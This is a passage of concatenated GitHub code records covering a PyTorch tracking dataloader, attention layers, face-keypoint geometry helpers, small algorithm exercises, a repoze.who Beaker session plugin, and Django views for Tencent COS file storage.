BackboneDataset(Dataset):\n def __init__(self, inputRes=None,\n # seqs_list_file='/home/zuochenyu/datasets/MOTSChallenge/train/instances_txt',\n seqs_list_file=r'E:\\Challenge\\MOTSChallenge\\train\\instances_txt',\n img_file_root=r'E:\\Challenge\\MOTSChallenge\\train\\images',\n # img_file_root='/home/zuochenyu/datasets/MOTSChallenge/train/images',\n transform=None,\n random_rev_thred=0.4,level=3):\n\n # self.imgPath = os.path.join(, \"{:04}\".format(sequence))\n self.transform = transform\n self.inputRes = inputRes\n self.random_rev_thred = random_rev_thred\n self.tr_image = transforms.Compose([transforms.ToTensor()])\n self.level = level\n\n self.img_list = []\n\n for sequence in [2,5,9,11]:\n imgPath = os.path.join(img_file_root, \"{:04}\".format(sequence))\n filename = os.path.join(seqs_list_file, \"{:04}.txt\".format(sequence))\n instance = load_txt(filename)\n for i in range(len(instance)):\n frame = i+1\n self.img_list.append((os.path.join(imgPath, \"{:06}.jpg\".format(frame)),instance[frame]))\n random.shuffle(self.img_list)\n\n def __len__(self):\n return len(self.img_list)\n\n def __getitem__(self, idx):\n seed = np.random.randint(2147483647) # make a seed with numpy generator\n instance_per_frame = self.img_list[idx][1]\n img = self.img_list[idx][0]\n img = cv2.imread(img)\n img = cv2.resize(img, (2048, 1024))\n img = Image.fromarray(img.astype('uint8')).convert('RGB')\n # img = img[:,:,:].transpose(2, 0, 1)\n # img = np.ascontiguousarray(img, dtype=np.float32)\n # img /= 255.0\n background = np.zeros([1024,2048])\n for obj in instance_per_frame:\n if obj.class_id!=2:\n continue\n mask = rletools.decode(obj.mask)\n mask = cv2.resize(mask, (2048, 1024))\n background[mask>0]=255\n if self.level==0:\n background = cv2.resize(background, (1020, 508))\n elif self.level==1:\n background = cv2.resize(background, (508, 252))\n elif self.level == 2:\n background = cv2.resize(background, (252, 124))\n elif self.level == 3:\n background = cv2.resize(background, (124, 60))\n background = Image.fromarray(background.astype('uint8'))\n\n if self.transform is not None:\n random.seed(seed) # apply this seed to img tranfsorms\n img = self.transform(img)\n img = self.tr_image(img)\n random.seed(seed) # apply this seed to img tranfsorms\n background = self.transform(background)\n background = self.tr_image(background)\n return {\"img\":img,\"mask\":background}","repo_name":"Zachary-Zuo/Multi-Object-Tracking-and-Segmentation-with-Pytorch","sub_path":"dataloaders/backbone_dataloader.py","file_name":"backbone_dataloader.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"34652973516","text":" \nfrom Aplicaciones.Agenda.models import Guardia\n\n@shared_task \ndef guardia_ranking_update():\n\n print(\"PROBANDO CELERY BEATS \"*20)\n guardias = Guardia.objects.filter(disponible=True)\n for guardia in guardias:\n if guardia.min_ranking < 200:\n guardia.min_ranking =+ 1\n guardia.save() \n\n","repo_name":"Alduxsan/AgendaGuardiasMedicas","sub_path":"api/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1059317315","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport copy\n\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass AttentionNet(nn.Module):\n \"Construct attention module\"\n\n def __init__(self, layer, N):\n super(AttentionNet, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, domainslots, context, delex_context):\n out = None\n for layer in self.layers:\n out = layer(domainslots, context, delex_context)\n return self.norm(out)\n\n\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module\"\n\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n \"A residual connection followed by a layer norm.\"\n\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n \"Apply residual connection to any sublayer with the same size.\"\n return x + self.dropout(sublayer(self.norm(x)))\n\n def expand_forward(self, x, sublayer):\n out = self.dropout(sublayer(self.norm(x)))\n out = out.mean(1).unsqueeze(1).expand_as(x)\n return x + out\n\n def nosum_forward(self, x, sublayer):\n return self.dropout(sublayer(self.norm(x)))\n\n\nclass SubLayer(nn.Module):\n def __init__(self, size, attn, feedforward, dropout, nb_attn):\n super(SubLayer, self).__init__()\n self.attn = attn\n self.feedforward = feedforward\n self.size = size\n self.attn = clones(attn, nb_attn)\n self.sublayer = clones(SublayerConnection(size, dropout), nb_attn+1)\n\n def forward(self, seq1, seq2, seq3):\n out = self.sublayer[0](\n seq1, lambda seq1: self.attn[0](seq1, seq1, seq1))\n #print(\"out size::\" + str(out.size()))\n out = self.sublayer[1](out, lambda out: self.attn[1](out, seq2, seq2))\n out = self.sublayer[2](out, lambda out: self.attn[2](out, seq3, seq3))\n return self.sublayer[3](out, self.feedforward)\n\n\ndef attention(query, key, value, mask=None, dropout=None):\n \"Compute 'Scaled Dot Product Attention'\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) \\\n / math.sqrt(d_k)\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim=-1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, d_in=-1, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n # We assume d_v always equals d_k\n self.d_k = d_model // h\n self.h = h\n if d_in < 0:\n d_in = d_model\n self.linears = clones(nn.Linear(d_in, d_model), 3)\n self.linears.append(nn.Linear(d_model, d_in))\n self.attn = None\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, value, mask=None):\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n\n # 1) Do all the linear projections in batch from d_model => h x d_k\n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n\n # 2) Apply attention on all the projected vectors in batch.\n x, self.attn = attention(query, key, value, mask=mask,\n dropout=self.dropout)\n\n # 3) \"Concat\" using a view and apply a final linear.\n x = x.transpose(1, 2).contiguous() \\\n .view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n","repo_name":"maxVeremchuk/univ1Mag","sub_path":"coursework/model/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"74063835291","text":"import os;\nimport sys;\n\ndef edit_distance(s1, s2):\n if (len(s1) < len(s2)):\n return edit_distance(s2, s1);\n if (len(s2) == 0):\n return len(s1);\n previous_row = range(len(s2) + 1);\n for i, c1 in enumerate(s1):\n current_row = [i + 1];\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1;\n deletions = current_row[j] + 1;\n substitutions = previous_row[j] + (c1 != c2);\n current_row.append(min(insertions, deletions, substitutions));\n previous_row = current_row;\n return previous_row[-1];\n\nclass Dataset:\n def __init__(self, line=''):\n if (line == ''):\n self.reads_path = '';\n self.type = ''; ### nanopore/pacbio/single/paired/mate\n self.frag_len = 0; ### Length of the fragment for paired end reads, insert size for mate pair libraries.\n self.frag_stddev = 0; ### Standard deviation of the above length.\n self.reads_path_a = '';\n self.reads_path_b = '';\n else:\n split_line = line.split(',');\n\n self.type = split_line[0];\n if (self.type == 'paired' or self.type == 'mate'):\n if (len(split_line) < 5):\n sys.stderr.write('ERROR: Five arguments need to be specified: \"reads_type,reads_path_a,reads_path_b,frag_len,frag_stddev\"!\\n');\n return;\n if (os.path.basename(split_line[1]) == ''):\n sys.stderr.write('ERROR: Reads file path not correctly specified! Exiting.\\n');\n exit(1);\n if (os.path.basename(split_line[2]) == ''):\n sys.stderr.write('ERROR: Reads file path not correctly specified! Exiting.\\n');\n exit(1);\n\n self.reads_path_a = os.path.abspath(split_line[1]);\n self.reads_path_b = os.path.abspath(split_line[2]);\n self.frag_len = int(split_line[3]);\n self.frag_stddev = int(split_line[4]);\n\n if (edit_distance(self.reads_path_a, self.reads_path_b) > 1):\n sys.stderr.write('ERROR: Paths to paired-end/mate-pair libraries should differ only in 1 character! Exiting.\\n');\n exit(1);\n # print 'self.reads_path_a = %s' % (self.reads_path_a);\n wildcard_path = list(self.reads_path_a);\n # print wildcard_path;\n # print '';\n d = zip(self.reads_path_a, self.reads_path_b);\n # print d;\n\n current_char = 0;\n for i,j in d:\n if (i != j):\n wildcard_path[current_char] = '?';\n current_char += 1;\n self.reads_path = ''.join(wildcard_path);\n\n # elif (self.type == 'nanopore' or self.type == 'pacbio' or self.type == 'single'):\n else:\n if (len(split_line) < 2):\n sys.stderr.write('ERROR: Two arguments need to be specified: \"reads_type,reads_path\"!\\n');\n return;\n if (os.path.basename(split_line[1]) == ''):\n sys.stderr.write('ERROR: Reads file path not correctly specified! Exiting.\\n');\n exit(1);\n self.reads_path = os.path.abspath(split_line[1]);\n\n # else:\n # sys.stderr.write('ERROR: Unknown type of reads specified as parameter: \"%s\"!\\n' % (line));\n # return;\n","repo_name":"kkrizanovic/NanoMark","sub_path":"src/dataspec.py","file_name":"dataspec.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"4225716221","text":"# https://leetcode.com/problems/kth-missing-positive-number/submissions/921489767/\n# Date of Submission: 2023-03-24\n\n# Runtime: 63 ms, faster than 24.4% of Python3 online submissions for Kth Missing Positive Integer.\n# Memory Usage: 14 MB, less than 74.10% of Python3 online submissions for Kth Missing Positive Integer.\n#\n\n# Problem:\n# Given an array arr of positive integers sorted in a strictly increasing order, and an integer k.\n# Return the kth positive integer that is missing from this array.\n\n\nclass Solution:\n def findKthPositive(self, arr: List[int], k: int) -> int:\n\n currVal = 0\n while k > 0:\n currVal+= 1\n if len(arr) == 0:\n k-=1\n elif currVal < arr[0]:\n k-=1\n elif currVal == arr[0]:\n arr=arr[1:]\n return currVal\n","repo_name":"Retroflux/playground","sub_path":"LeetCodeSolutions/Python/1539-Kth_Missing_Positive_Number/memory_optimized_solution.py","file_name":"memory_optimized_solution.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23507509787","text":"import torch\nfrom torch.autograd import Variable\nimport numpy as np\nfrom skimage.io import (imread,\n imsave)\nfrom skimage.transform import resize\n\ndef gkern(l=5, sig=1.):\n \"\"\"\n Creates gaussian kernel with side length l and a sigma of sig.\n Acknowledgement: https://stackoverflow.com/users/6465762/clemisch\n \"\"\"\n ax = np.arange(-l // 2 + 1., l // 2 + 1.)\n xx, yy = np.meshgrid(ax, ax)\n kernel = np.exp(-(xx**2 + yy**2) / (2. * sig**2))\n return kernel / np.sum(kernel)\n\ndef get_fm_for_xy(x,y):\n \"\"\"\n Return a feature map corresponding to a keypt at\n location (x,y).\n \"\"\"\n fm = np.zeros((128,128))\n gauss_len = 8\n gauss_std = 1 # 2 \n #x,y = 64, 64\n kern = gkern(l=gauss_len, sig=gauss_std)\n # The kernel may be bigger than the region\n # of the image it is applied to, so crop it\n # here if necessary.\n xh, xw = fm[y-(gauss_len//2):y+(gauss_len//2),\n x-(gauss_len//2):x+(gauss_len//2)].shape\n kern = kern[0:xh,0:xw]\n fm[y-(gauss_len//2):y+(gauss_len//2),\n x-(gauss_len//2):x+(gauss_len//2)] += kern\n return fm\n\ndef read_kpt_file(filename, sep=\",\"):\n \"\"\"Return np array of keypts\"\"\"\n kpts = open(filename).read().split(\"\\n\")[0:-1]\n kpts = [ elem.split(sep) for elem in kpts ]\n num_cols = len(kpts[0])\n for entry in kpts:\n for i in range(num_cols):\n entry[i] = float(entry[i])\n kpts = np.asarray(kpts)\n return kpts\n\ndef get_data_from_id(root, mode, id_):\n \"\"\"\n Returns:\n - img_downsized: this is the image in 128px res.\n - y_keypts: the keypts in range [0, 1]. To plot\n these, multiply by 128., and overlay these on \n img_downsized.\n - z_keypts: the z keypoints normalised.\n \"\"\"\n img = imread(\"%s/%s_img/%s.jpg\" % (root,mode,id_))\n keypts = read_kpt_file(\"%s/%s_lm/%s_lm.csv\" % (root,mode,id_))\n # We want the img + keypts in 128x128px img so preproc them\n # accordingly.\n img_downsized = resize(img, (128,128))\n y_keypts = np.copy(keypts)[:,0:2]\n y_keypts[:,0] = y_keypts[:,0] / float(img.shape[1]) # x's\n y_keypts[:,1] = y_keypts[:,1] / float(img.shape[0]) # y's\n avg_sz = (img.shape[0]+img.shape[1]) / 2.\n z_keypts = keypts[:,2] / avg_sz # what range??\n return img_downsized, y_keypts, z_keypts\n\ndef construct_A(src_kps, src_z_pred):\n K = 66\n bs = src_kps.shape[0]\n # TODO: make more efficient\n A = np.zeros((bs, K*2, 8))\n for b in range(bs):\n c = 0\n for i in range(0, A.shape[1]-1, 2):\n A[b, i, 0] = src_kps[b, 0, c] # xi\n A[b, i, 1] = src_kps[b, 1, c] # yi\n #A[i,2] = z_pred[c] # zi\n A[b, i, -2] = 1.\n #\n A[b, i+1, 3] = src_kps[b, 0, c] # xi\n A[b, i+1, 4] = src_kps[b, 1, c] # yi\n #A[i+1,6] = z_pred[c] # zi\n A[b, i+1, -1] = 1.\n c += 1\n A = torch.from_numpy(A).float()\n if src_z_pred.is_cuda:\n A = A.cuda()\n for b in range(bs):\n c = 0\n for i in range(0, A.size(1)-1, 2):\n A[b, i, 2] = src_z_pred[b, 0, c] # zi\n A[b, i+1, 5] = src_z_pred[b, 0, c] # zi\n c += 1\n return A\n\ndef predict_tgt_kp_pseudoinv(xy_keypt_src,\n pred_src_z,\n xy_keypt_tgt):\n \"\"\"\n Given src keypts, predicted depths, and tgt keypts,\n construct a baseline estimate of the predicted \n tgt keypoints through the pseudo-inverse (fixed m)\n formulation in the paper.\n xy_keypt_src: (bs, 66, 2) in numpy\n pred_src_z: (bs, 1, 66) in Torch\n xy_keypt_tgt: (bs, 66, 2) in numpy\n \"\"\"\n # TODO\n assert xy_keypt_src.shape[0] == 1\n assert xy_keypt_tgt.shape[0] == 1\n # TODO\n A = construct_A(xy_keypt_src.swapaxes(1,2),\n pred_src_z)\n tgt_kps_f = xy_keypt_tgt.swapaxes(1,2).reshape((1, 2*66), order='F')\n xt = torch.from_numpy(tgt_kps_f).float()\n X1 = [torch.inverse(mat) for mat in\n torch.matmul(A.transpose(2, 1), A)]\n X1 = torch.stack(X1)\n X2 = torch.bmm(A.transpose(2, 1), xt.unsqueeze(2))\n m = torch.bmm(X1, X2) # (bs,8,1)\n bs = xy_keypt_src.shape[0]\n m_rshp = torch.cat((m[:, 0:6, :].reshape((bs, 2, 3)),\n m[:, [6, 7], :].reshape((bs, 2, 1))),\n dim=2)\n ones = torch.ones((1, 1, 66)).float()\n xy_keypt_src_torch = torch.from_numpy(xy_keypt_src).float()\n xy_keypt_src_torch = xy_keypt_src_torch.transpose(1,2)\n rht = torch.cat((xy_keypt_src_torch,\n pred_src_z,\n ones), dim=1)\n rhs = torch.matmul(m_rshp, rht)\n return rhs\n\ndef convert_keypts_66_to_68(arr):\n kps_68 = np.zeros((68, 2))\n kps_68[0:60] = arr[0:60] # kpts 1 to 60 is kypts 1 to 60\n kps_68[60] = (arr[60-1]+arr[50-1]) / 2. # kpt 61 is the avg of kpts 60 and 50\n kps_68[61] = arr[60] # kpt 62 is keypt 61\n kps_68[62] = arr[61] # kpt 63 is keypt 62\n kps_68[63] = arr[62] # kpt 64 is keypt 63\n kps_68[64] = (arr[54-1] + arr[56-1]) / 2. # kpt 65 is the avg of kpts 54 and 56\n kps_68[65] = arr[63] # kpt 66 is keypt 64\n kps_68[66] = arr[64] # kpt 67 is keypt 65\n kps_68[67] = arr[65] # kpt 68 is keypt 66\n return kps_68\n\ndef convert_depth_66_to_68(arr):\n d_68 = np.zeros((68,))\n d_68[0:60] = arr[0:60] # kpts 1 to 60 is kypts 1 to 60\n d_68[60] = (arr[60-1]+arr[50-1]) / 2. # kpt 61 is the avg of kpts 60 and 50\n d_68[61] = arr[60] # kpt 62 is keypt 61\n d_68[62] = arr[61] # kpt 63 is keypt 62\n d_68[63] = arr[62] # kpt 64 is keypt 63\n d_68[64] = (arr[54-1] + arr[56-1]) / 2. # kpt 65 is the avg of kpts 54 and 56\n d_68[65] = arr[63] # kpt 66 is keypt 64\n d_68[66] = arr[64] # kpt 67 is keypt 65\n d_68[67] = arr[65] # kpt 68 is keypt 66\n return d_68\n\ndef shift_matrix(shift):\n mat = np.eye(4)\n mat[0,-1] = shift\n mat[1,-1] = shift\n return mat\n\ndef scale_matrix(scale):\n mat = np.eye(4)\n mat[0,0] = scale\n mat[1,1] = scale\n return mat\n\ndef rot_matrix_x(theta):\n \"\"\"\n theta: measured in radians\n \"\"\"\n mat = np.zeros((3,3)).astype(np.float32)\n mat[0, 0] = 1.\n mat[1, 1] = np.cos(theta)\n mat[1, 2] = -np.sin(theta)\n mat[2, 1] = np.sin(theta)\n mat[2, 2] = np.cos(theta)\n return mat\n\n\ndef rot_matrix_y(theta):\n \"\"\"\n theta: measured in radians\n \"\"\"\n mat = np.zeros((3,3)).astype(np.float32)\n mat[0, 0] = np.cos(theta)\n mat[0, 2] = np.sin(theta)\n mat[1, 1] = 1.\n mat[2, 0] = -np.sin(theta)\n mat[2, 2] = np.cos(theta)\n return mat\n\ndef rot_matrix_z(theta):\n \"\"\"\n theta: measured in radians\n \"\"\"\n mat = np.zeros((3,3)).astype(np.float32)\n mat[0, 0] = np.cos(theta)\n mat[0, 1] = -np.sin(theta)\n mat[1, 0] = np.sin(theta)\n mat[1, 1] = np.cos(theta)\n mat[2, 2] = 1.\n return mat\n\ndef affine_matrix_and_rotation(theta, mean, std, rot_mat):\n \"\"\"Construct an affine matrix of a rotation\n about the y axis\"\"\"\n\n shift1 = shift_matrix(-mean)\n scale1 = scale_matrix(1.0 / std)\n\n shift2 = shift_matrix(mean)\n scale2 = scale_matrix(std)\n \n rot_3x3 = rot_mat(theta) # 3x3\n rot = np.eye(4)\n rot[0:3,0:3] = rot_3x3\n \n result = np.dot(np.dot(np.dot(np.dot(shift1,scale1),rot),scale2),shift2)\n\n affine = np.hstack( (result[0:2,0:3],\n np.zeros((2,1)) ) )\n \n return affine\n\ndef affine_matrix_x(theta, mean, std):\n return affine_matrix_and_rotation(theta, mean, std,\n rot_matrix_x)\n\ndef affine_matrix_y(theta, mean, std):\n return affine_matrix_and_rotation(theta, mean, std,\n rot_matrix_y)\n\ndef affine_matrix_z(theta, mean, std):\n return affine_matrix_and_rotation(theta, mean, std,\n rot_matrix_z) \n\ndef compute_covar(preds, actuals, n_kps=66):\n return np.sum(np.diag(np.abs(np.corrcoef(preds, actuals, rowvar=0)[0:n_kps,n_kps::])))\n","repo_name":"joelmoniz/DepthNets","sub_path":"depthnet-pytorch/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"32"} +{"seq_id":"71073943132","text":"# You are given the root of a binary search tree. Return true if it is a valid binary search tree, and false otherwise.\n# Recall that a binary search tree has the property that all values in the left subtree are\n# less than or equal to the root, and all values in the right subtree are greater than or equal to the root.\n\n\nclass TreeNode:\n def __init__(self, key):\n self.left = None\n self.right = None\n self.key = key\n\n def __str__(self):\n return self.key\n\n\ndef is_bst(node):\n print(node.key, end=\" \")\n if (node.left is not None and node.left.key > node.key) \\\n or (node.right is not None and node.right.key < node.key):\n return False\n left_ok = True if node.left is None else is_bst(node.left)\n right_ok = True if node.right is None else is_bst(node.right)\n return left_ok and right_ok\n\n\n# 5\n# / \\\n# 3 7\n# / \\ /\n# 1 4 6\na = TreeNode(5)\na.left = TreeNode(3)\na.right = TreeNode(7)\na.left.left = TreeNode(1)\na.left.right = TreeNode(4)\na.right.left = TreeNode(6)\nprint(is_bst(a))\n\n# 5\n# / \\\n# 3 7\n# / \\ /\n# 1 4 8\n\na = TreeNode(5)\na.left = TreeNode(3)\na.right = TreeNode(7)\na.left.left = TreeNode(1)\na.left.right = TreeNode(4)\na.right.left = TreeNode(8)\nprint(is_bst(a))\n","repo_name":"lvoinescu/python-daily-training","sub_path":"check_bst_tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11571059901","text":"import os as os\nimport numpy as np\nfrom scipy.io import savemat\nfrom PIL import Image\n\nloaded_data = {}\nsize = 2304\nbase_path = 'faceData/CK+48/'\n\ndef get_image_path(label,file_name):\n return base_path+label+'/'+file_name\nlabels = os.listdir(base_path)\n#save the data in .mat format\nfor label in labels:\n file_list = os.listdir(base_path + label)\n print('{} : {}'.format(label,len(file_list)))\n X = np.zeros((size,1))\n for file_name in file_list:\n image = np.array(Image.open(get_image_path(label,file_name)).getdata()).reshape(size,1)\n X = np.hstack((X,image))\n loaded_data[label] = X[:,1:]\n\nsavemat('faceData/face_data.mat',loaded_data)\n\n#save the intire training set and data to .mat format\nX = np.zeros((size,1))\nY = np.zeros((1,1))\nfor i,label in enumerate(labels):\n t = loaded_data[label]\n X = np.hstack((X,t))\n Y = np.hstack((Y,(i+1)*np.ones((1,t.shape[1]))))\nsavemat('data_set.mat',{\n 'X' : X[:,1:],\n 'Y' : Y[:,1:],\n 'labels' : labels\n})\n","repo_name":"yeaung276/ML","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73839242330","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"repoze.who identifier plugin that persists to beaker sessions\"\nfrom past.builtins import basestring\nfrom builtins import object\nimport re\n\nfrom zope.interface import implementer\n\nfrom repoze.who.interfaces import IIdentifier\n\nSPLIT_RE = re.compile(r'\\s*,\\s*')\nPERSIST_KEYS = ['userdata', 'tokens']\n\n\n@implementer(IIdentifier)\nclass UseBeakerPlugin(object):\n \"Identify plugin that uses beaker\"\n\n def __init__( # pylint: disable=dangerous-default-value\n self, key_name='repoze.who.tkt',\n session_name='beaker.session', delete_on_logout=False,\n alsopersist=PERSIST_KEYS):\n \"\"\"Create an identification plugin storing at least the\n ``identity['repoze.who.userid']`` item in a beaker session.\n\n :param alsopersist: names of additional identity items saved in\n session. Default: ``alsopersist==['userdata']``\n :type alsopersist: sequence\n \"\"\"\n\n self.key_name = key_name\n self.session_name = session_name\n self.delete_on_logout = delete_on_logout\n self.persistkeys = alsopersist\n\n def identify(self, environ):\n \"\"\"Return identity from Beaker session\"\"\"\n\n _sess = self._get_beaker(environ)\n identity = _sess.get(self.key_name, None)\n if identity and isinstance(identity, dict) and \\\n identity.get('repoze.who.userid'):\n return identity\n\n def forget(self, environ, identity): # pylint: disable=unused-argument\n \"\"\"Does not return any headers, just deletes the session entry.\n \"\"\"\n\n _sess = self._get_beaker(environ)\n\n if self.delete_on_logout:\n # When the user logs out remove the session altogether\n _sess.delete()\n else:\n # Only erase the user name. If the user logs in again he will get\n # the same session\n try:\n del _sess[self.key_name]\n except BaseException:\n pass\n else:\n _sess.save()\n\n return []\n\n def remember(self, environ, identity):\n \"\"\"Does not return any headers, just saves identity to Beaker session\n \"\"\"\n _sess = self._get_beaker(environ)\n pidentity = _sess.get(self.key_name)\n if pidentity and isinstance(pidentity, dict):\n puserid = pidentity.get('repoze.who.userid')\n else:\n puserid = None\n\n iuserid = identity.get('repoze.who.userid')\n if puserid != iuserid:\n tkt_identity = {'repoze.who.userid': iuserid}\n for i in self.persistkeys:\n item = identity.get(i)\n if item:\n tkt_identity[i] = item\n _sess[self.key_name] = tkt_identity\n _sess.save()\n return []\n\n def _get_beaker(self, environ):\n \"\"\"Returns Beaker session\"\"\"\n _sess = environ.get(self.session_name, None)\n\n if not _sess:\n raise ValueError(\n 'No Beaker session (%s) in environment' % self.session_name)\n\n return _sess\n\n def __repr__(self):\n return '<%s %s>' % (self.__class__.__name__, id(self))\n\n\ndef make_plugin( # pylint: disable=dangerous-default-value\n key_name='repoze.who.tkt', session_name='beaker.session',\n delete_on_logout=False, alsopersist=PERSIST_KEYS):\n \"\"\"see :class:`UseBeakerPlugin`\"\"\"\n if isinstance(alsopersist, basestring):\n alsopersist = SPLIT_RE.split(alsopersist)\n return UseBeakerPlugin(\n key_name, session_name, delete_on_logout, alsopersist)\n","repo_name":"akissa/repoze.who-use_beaker","sub_path":"repoze/who/plugins/use_beaker.py","file_name":"use_beaker.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"37398677853","text":"import json\n\nimport requests\nfrom django.shortcuts import render, redirect, reverse\nfrom django.http import JsonResponse, HttpResponse\nfrom web.forms.file import FileModelForm, FilePutModelForm\nfrom web import models\nfrom django.forms import model_to_dict\nfrom web.utils.tencent.cos import delete_file, delete_files,credential\n\n\ndef file(request, project_id):\n parent_object = None\n folder_id = request.GET.get('folder', '')\n if folder_id.isdecimal():\n parent_object = models.FileRepository.objects.filter(id=folder_id, file_type=2,\n project=request.tracer.project).first()\n\n if request.method == 'GET':\n parent = parent_object\n navbar_list = []\n while parent:\n navbar_list.insert(0, model_to_dict(parent, ['id', 'name']))\n parent = parent.parent\n form = FileModelForm(request, parent_object)\n query_set = models.FileRepository.objects.filter(project=request.tracer.project)\n if parent_object:\n file_object_list = query_set.filter(parent=parent_object).order_by('-file_type')\n else:\n file_object_list = query_set.filter(parent=None).order_by('-file_type')\n return render(request, 'file.html',\n {\"form\": form,\n 'file_object_list': file_object_list,\n 'navbar_list': navbar_list,\n 'folder_id': folder_id})\n\n fid = request.POST.get('fid', '')\n edit_object = None\n if fid.isdecimal():\n edit_object = models.FileRepository.objects.filter(id=fid, file_type=2, project=request.tracer.project).first()\n if edit_object:\n form = FileModelForm(request, parent_object, data=request.POST, instance=edit_object)\n else:\n form = FileModelForm(request, parent_object, data=request.POST)\n if form.is_valid():\n form.instance.project = request.tracer.project\n form.instance.file_type = 2\n form.instance.parent = parent_object\n form.instance.update_user = request.tracer.user\n form.save()\n return JsonResponse({\"status\": True})\n return JsonResponse({\"status\": False, \"error\": form.errors})\n\n\ndef file_delete(request, project_id):\n fid = request.GET.get('fid')\n delete_object = models.FileRepository.objects.filter(id=fid, project=request.tracer.project).first()\n if delete_object.file_type == 1:\n # 删除文件:1.归还所使用的空间\n request.tracer.project.use_space -= delete_object.file_size\n request.tracer.project.save()\n # 删除文件:2.将cos中的文件也删除\n delete_file(request.tracer.project.region, request.tracer.project.bucket, delete_object.key)\n # 删除文件:3.将文件在数据库中删除\n delete_object.delete()\n return JsonResponse({\"status\": True})\n\n # 删除文件夹,同时删除该文件夹下的所有文件和文件夹\n # 该文件夹下所有文件的使用容量汇总,用户归还项目空间容量\n total_size = 0\n # 该文件夹下所有文件的key\n key_list = []\n # 该文件夹下所有的文件夹列表\n folder_list = [delete_object, ]\n # 循环文件夹列表,找出数据库中的以该文件夹为父级目录的所有文件夹和文件\n for folder in folder_list:\n # 找出数据库中的以该文件夹为父级目录的所有文件夹和文件\n child_list = models.FileRepository.objects.filter(project=request.tracer.project, parent=folder).order_by(\n '-file_type')\n for child in child_list:\n if child.file_type == 2:\n # 如果是文件夹,加入文件夹列表\n folder_list.append(child)\n else:\n # 如果是文件,将文件大小汇总,并将文件的key加入key列表\n total_size += child.file_size\n key_list.append({\"Key\": child.key})\n # 归还使用空间\n request.tracer.project.use_space -= total_size\n request.tracer.project.save()\n # 删除cos中的所有文件\n delete_files(request.tracer.project.region, request.tracer.project.bucket, key_list)\n # 删除数据库中的所有文件和文件夹\n delete_object.delete()\n return JsonResponse({\"status\": True})\n\n\ndef cos_credential(request, project_id):\n \"\"\" 获取cos上传临时凭证 \"\"\"\n per_file_limit = request.tracer.price_policy.per_file_size * 1024 * 1024\n total_file_limit = request.tracer.price_policy.project_space * 1024 * 1024 * 1024\n\n total_size = 0\n file_list = json.loads(request.body.decode('utf-8'))\n for item in file_list:\n # 文件的字节大小 item['size'] = B\n # 单文件限制的大小 M\n # 超出限制\n if item['size'] > per_file_limit:\n msg = \"单文件超出限制(最大{}M),文件:{},请升级套餐。\".format(request.tracer.price_policy.per_file_size, item['name'])\n return JsonResponse({'status': False, 'error': msg})\n total_size += item['size']\n\n # 做容量限制:单文件 & 总容量\n\n # 总容量进行限制\n # request.tracer.price_policy.project_space # 项目的允许的空间\n # request.tracer.project.use_space # 项目已使用的空间\n if request.tracer.project.use_space + total_size > total_file_limit:\n return JsonResponse({'status': False, 'error': \"容量超过限制,请升级套餐。\"})\n\n data_dict = credential(request.tracer.project.bucket, request.tracer.project.region)\n return JsonResponse({'status': True, 'data': data_dict})\n\n\ndef file_post(request, project_id):\n \"\"\" 已上传成功的文件写入到数据 \"\"\"\n \"\"\"\n name: fileName,\n key: key,\n file_size: fileSize,\n parent: CURRENT_FOLDER_ID,\n # etag: data.ETag,\n file_path: data.Location\n \"\"\"\n\n # 